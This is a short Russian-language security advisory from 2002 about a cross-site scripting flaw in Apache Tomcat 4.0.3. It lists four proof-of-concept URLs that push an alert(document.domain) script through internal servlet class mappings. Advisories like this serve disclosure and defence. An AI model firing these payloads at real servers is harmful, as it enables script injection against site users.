Security Lab

Межсайтовый скриптинг в Apache Tomcat

Дата публикации:12.07.2002
Всего просмотров:1610
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Apache Tomcat - servlet контейнер, который используется в технологиях Reference Implementation for the Java Servlet and JavaServer Pages.

Используя отображения /servlet/ чтобы вызвать различные servlets/classes, можно заставить Tomcat выполнить произвольный код сценария(угловые скобки пропущены):

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.ContainerServlet/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Context/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Globals/ SCRIPTalert(document.domain)/SCRIPT

уязвимость обнаружена в Apache Tomcat version 4.0.3

Ссылки: Apache Tomcat Cross-Site Scripting